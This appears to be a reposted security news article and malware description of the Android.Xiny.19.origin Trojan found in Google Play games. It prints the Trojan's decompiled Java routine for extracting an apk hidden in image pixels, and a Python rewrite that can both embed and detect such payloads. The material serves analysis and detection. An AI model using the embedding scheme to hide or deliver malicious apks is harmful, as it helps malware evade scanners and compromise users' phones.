Doctor Web security researchers detected the Android.Xiny.19.origin Trojan in dozens of games published on the Google Play store. The Trojan is designed to download, install, and run programs upon receiving a command from cybercriminals. It can also display annoying advertisements.

Bad news for Android users: according to the security firm Doctor Web, dozens of game apps in the Google Play Store have been infected with the Android.Xiny.19.origin Trojan. The malware lets attackers control the victim's device by installing and running arbitrary software (apk files), and it also displays annoying advertisements.

The main threat of Android.Xiny.19.origin lies in its ability to download and dynamically run arbitrary apk files on the criminals' command, and the way this is carried out is rather unusual. To disguise the malicious program, the authors hide it in specially crafted images using steganography. Unlike cryptography, which encrypts the source data and may therefore arouse suspicion, steganography conceals the very existence of the information. The authors presumably hoped to complicate detection by betting that security analysts would not look closely at seemingly benign images.

The malware collects information from the infected device and sends it to the command and control server: the IMEI, the MAC address, the operating system version and language, and the mobile network operator's name.

The Trojan was embedded into more than 60 games distributed via Google Play under the names of more than 30 developers, including Conexagon Studio, Fun Color Games, BILLAPPS and many others. Although Doctor Web has already informed Google about the incident, at the time of writing the affected applications were still available on Google Play. Until they are removed, it is recommended not to download games from the store to devices without anti-virus software.

Another notable feature of Android.Xiny is the delivery channel for its payloads: the Trojan receives specially crafted images from the server and retrieves the apk hidden inside them by steganography.

The Android.Xiny malware can perform many other malicious operations without the user's consent. The researchers noted that, although it is not yet able to gain root privileges on its own, it can download the appropriate exploit in order to gain root access to the device.

Unfortunately, using Google Play to distribute malware is nothing new: in January the Lookout firm discovered 13 Android apps infected with the Brain Test malware available for download on the official Google Play store.

Android.Xiny.19.origin – sends the following information about the affected device to the server: its IMEI and MAC address, the version and current language of the operating system, and the mobile network operator's name. In addition, the cybercriminals learn whether a memory card is available, the name of the application the Trojan is incorporated into, and whether that application resides in the system folder.

Upon receiving the required image from the server, Android.Xiny.19.origin retrieves the hidden apk file with the help of a special algorithm and then executes it.

Android.Xiny.19.origin – can perform other malicious functions, such as downloading software and prompting the user to install it, or installing and deleting applications without the user's knowledge if root access is available on the device. It can also display annoying advertisements.

Android.Xiny.19.origin – is not yet able to gain root privileges. However, given that the Trojan is mainly designed to install software, it can download a set of exploits from the server in order to gain root access to the device for covert installation or deletion of applications.

Doctor Web security researchers would like to warn users against installing dubious applications even if they are published on Google Play. Dr.Web for Android successfully detects all the known applications containing Android.Xiny.19.origin, so they do not pose any threat to our users.

The Trojan Android.Xiny.19.origin

Added to Dr.Web virus database: 2016-01-29

Virus description was added: 2016-01-29

It is a Trojan for Android devices that is embedded into various games published on Google Play.

Android.Xiny.19.origin sends the following information to the command and control server:

IMEI identifier

IMSI identifier

Information about the mobile operator

Presence of a memory card in a device

Country

Language

MAC address

Version of the operating system

Package name and version of the application the Trojan is incorporated into

Presence of the malicious application in the system folder

The Trojan can execute the following actions:

Displays annoying advertisements

Downloads applications and prompts the user to install them

Installs and deletes programs if root access is available on a device

Launches arbitrary apk files hidden in images received from the C&C server

The way apk files are launched looks as follows: Android.Xiny.19.origin downloads from the server a specially crafted image that contains the file hidden by steganography (the payload bytes are spread over the low four bits of the red, green and blue channel of each pixel). Then the Trojan retrieves the apk file using the following routine:


package com.wch.c_direct.encrypt.logic;

import android.graphics.Bitmap;
import android.graphics.BitmapFactory;
import com.wch.c_direct.logic.a;   // obfuscated helper class; a.a() is called below but its body is not shown
import java.io.InputStream;
import java.util.Arrays;

public final class BitmapDecryptor {

    // Decodes the image, takes the low 4 bits of the R, G and B channel of every pixel
    // (three nibbles per pixel, rows left to right, top to bottom) and packs nibble
    // pairs into bytes. The first 4 bytes are a big-endian length that counts itself;
    // everything after them is the raw apk.
    public static byte[] decrypt(InputStream inputStream) {
        int i5;
        int i = 4;   // size of the length header in bytes
        int i1 = 8;  // nibbles needed to rebuild the 4-byte header
        a.a();
        Bitmap bitmap0 = BitmapFactory.decodeStream(inputStream);
        bitmap0.setHasAlpha(true);

        // Pass 1: read only the 8 header nibbles.
        byte[] buffer1 = new byte[i1];
        int i2 = 0;  // nibble index
        int i3 = 0;  // pixel row
        int i4 = 0;  // pixel column
        while(i2 < buffer1.length) {
            i5 = bitmap0.getPixel(i4, i3);           // packed ARGB int
            buffer1[i2] = ((byte)(i5 >> 16 & 15));   // low nibble of red
            if(i2 + 1 < i1) {
                buffer1[i2 + 1] = ((byte)(i5 >> 8 & 15));  // low nibble of green
            }
            if(i2 + 2 < i1) {
                buffer1[i2 + 2] = ((byte)(i5 & 15));       // low nibble of blue
            }
            ++i4;
            if(i4 == bitmap0.getWidth()) {  // wrap to the next row
                ++i3;
                i4 = 0;
            }
            i2 += 3;
        }

        // Header nibbles -> 4 bytes -> big-endian int: total length, header included.
        byte[] buffer2 = BitmapDecryptor.a(buffer1);
        i2 = 0;
        i3 = 0;
        while(i2 < i) {
            i3 = i3 << 8 | buffer2[i2] & 255;
            ++i2;
        }

        // Pass 2: start again at pixel (0,0) and read i3 bytes' worth of nibbles
        // (i3 * 8 / 4 == 2 * i3). No bounds check: a bogus length makes getPixel throw.
        buffer1 = new byte[i3 * 8 / 4];
        i2 = 0;
        i3 = 0;
        i4 = 0;
        while(i2 < buffer1.length) {
            i5 = bitmap0.getPixel(i4, i3);
            buffer1[i2] = ((byte)(i5 >> 16 & 15));
            if(i2 + 1 < buffer1.length) {
                buffer1[i2 + 1] = ((byte)(i5 >> 8 & 15));
            }
            if(i2 + 2 < buffer1.length) {
                buffer1[i2 + 2] = ((byte)(i5 & 15));
            }
            ++i4;
            if(i4 == bitmap0.getWidth()) {
                ++i3;
                i4 = 0;
            }
            i2 += 3;
        }

        byte[] decrypted = BitmapDecryptor.a(buffer1);
        bitmap0.recycle();
        // Drop the 4-byte header; what remains is the apk.
        return Arrays.copyOfRange(decrypted, i, decrypted.length);
    }

    // Packs nibble pairs into bytes, high nibble first: out[i] = in[2*i] << 4 | in[2*i + 1].
    private static byte[] a(byte[] inBuffer) {
        a.a();
        byte[] outBuffer = new byte[inBuffer.length / 2];
        int i;
        for(i = 0; i < outBuffer.length; ++i) {
            int i1;
            for(i1 = 0; i1 < 2; ++i1) {
                outBuffer[i] = ((byte)(outBuffer[i] << 4 | inBuffer[i * 8 / 4 + i1]));
            }
        }
        return outBuffer;
    }
}

After that, the malicious application loads the retrieved file into the memory of the infected device using the DexClassLoader class.
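The extraction routine above, rewritten as an added Python example (not Doctor Web's analysis code and not the Trojan's own code) so that an analyst can both reproduce the hiding scheme and test whether an image carries a payload in this format. The cover image is represented as a row-major list of (r, g, b) tuples reached through a get_pixel(x, y) callback, which is also how Pillow's Image.getpixel behaves, so the same functions can be pointed at a real PNG; the pixel data and the stand-in apk here are constructed sample data. Two things are this example's own additions: the check that a recovered payload starts with the ZIP local-file-header magic PK\x03\x04 (an apk is a ZIP archive, so a real payload must begin that way), and the range check on the length field, which the decompiled code lacks (it simply lets getPixel throw when the length runs past the image).

```python
import struct

# Every apk is a ZIP archive, so a correctly recovered payload starts with the
# ZIP local-file-header magic. Analyst heuristic, not part of the Trojan's code.
ZIP_MAGIC = b"PK\x03\x04"


def _to_nibbles(data):
    """Split bytes into 4-bit values, high nibble first (inverse of BitmapDecryptor.a)."""
    out = []
    for b in data:
        out.append(b >> 4)
        out.append(b & 0x0F)
    return out


def _pack_nibbles(nibs):
    """Pack nibble pairs into bytes, high nibble first; an odd trailing nibble is dropped, as in BitmapDecryptor.a."""
    return bytes((nibs[i] << 4) | nibs[i + 1] for i in range(0, len(nibs) - 1, 2))


def _read_nibbles(get_pixel, width, count):
    """Read `count` low nibbles from R, G, B of successive pixels, rows left to right, top to bottom."""
    out = []
    x = y = 0
    while len(out) < count:
        r, g, b = get_pixel(x, y)
        for v in (r & 0x0F, g & 0x0F, b & 0x0F):
            if len(out) < count:
                out.append(v)
        x += 1
        if x == width:
            x, y = 0, y + 1
    return out


def embed(payload, pixels, width, height):
    """Hide payload in a row-major list of (r, g, b) tuples using the Trojan's framing:
    a 4-byte big-endian length that counts itself, then the raw bytes, two nibbles per
    byte, three nibbles per pixel. Modifies `pixels` in place and returns it."""
    frame = struct.pack(">I", len(payload) + 4) + payload
    nibs = _to_nibbles(frame)
    if len(nibs) > 3 * width * height:
        raise ValueError("cover image too small for this payload")
    for i in range(0, len(nibs), 3):
        chan = list(pixels[i // 3])
        for k, n in enumerate(nibs[i:i + 3]):
            chan[k] = (chan[k] & 0xF0) | n   # overwrite only the low nibble of the channel
        pixels[i // 3] = tuple(chan)
    return pixels


def extract(get_pixel, width, height):
    """Reproduce BitmapDecryptor.decrypt: read the 4-byte header, then re-read that many
    bytes from pixel (0, 0) and strip the header. Unlike the original, reject a length
    field that would run past the image instead of letting the pixel read fail."""
    if 3 * width * height < 8:
        raise ValueError("image too small to hold a header")
    total = struct.unpack(">I", _pack_nibbles(_read_nibbles(get_pixel, width, 8)))[0]
    capacity = 3 * width * height // 2  # bytes that fit in the image
    if total < 4 or total > capacity:
        raise ValueError("length field %d is not plausible for a %dx%d image" % (total, width, height))
    data = _pack_nibbles(_read_nibbles(get_pixel, width, total * 2))
    return data[4:]


def is_xiny_carrier(get_pixel, width, height):
    """Triage check: does this image decode, under the Trojan's scheme, to something that looks like an apk?"""
    try:
        return extract(get_pixel, width, height).startswith(ZIP_MAGIC)
    except ValueError:
        return False


def make_cover(width, height):
    """Constructed sample cover image: a plain gradient with no hidden data."""
    return [((x * 4) & 0xFF, (y * 5) & 0xFF, 0x80) for y in range(height) for x in range(width)]


def demo(width=64, height=48):
    """Round-trip a constructed stand-in apk through a cover image and return
    (payload survived, carrier detected)."""
    pixels = make_cover(width, height)
    fake_apk = ZIP_MAGIC + bytes(range(256)) * 4   # constructed stand-in, not a real apk
    embed(fake_apk, pixels, width, height)
    get_pixel = lambda x, y: pixels[y * width + x]
    return extract(get_pixel, width, height) == fake_apk, is_xiny_carrier(get_pixel, width, height)


if __name__ == "__main__":
    print(demo())  # (True, True)
```

To run the check against a real file, load it with Pillow as `img = Image.open(path).convert("RGB")` and call `is_xiny_carrier(lambda x, y: img.getpixel((x, y)), *img.size)`. On a clean image the decoded "length" is whatever noise sits in the first three pixels, which the range check rejects almost every time; a carrier in this format yields a length that fits the image and a payload starting with the ZIP magic.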

How to Detect & Remove Android.Xiny Trojan from Android Phone

Google will likely remove these malicious apps from the Play Store soon, but if you have already installed one of them, you can detect and remove the Android.Xiny malware from your phone as follows:

1. Download and install Dr.Web Antivirus Light on your Android phone.



2. Launch Dr.Web Antivirus and update the virus definitions. Then tap on the Scanner button.

3. Choose Full scan to scan everything on the internal storage as well as on external memory cards.



4. The scan may take a long time to finish if you have many files on your memory cards. During the scan it may sound audible alerts when it detects malware. After the scan is complete, it will show whether the Android.Xiny trojan was detected.



5. Touch the ellipsis next to each infected file and choose Delete.



The Android.Xiny trojan is dangerous because it can download APK files hidden inside image files using basic steganography. Many anti-virus apps do not scan image files, treating them as harmless, and that is how it has evaded detection so far. The trojan also receives instructions from a command and control server run remotely by cybercriminals. That is why it is important to scan for and remove the Android.Xiny trojan from your and your friends' phones.

Sources:

drweb.com

securityaffairs.co

www.trishtech.com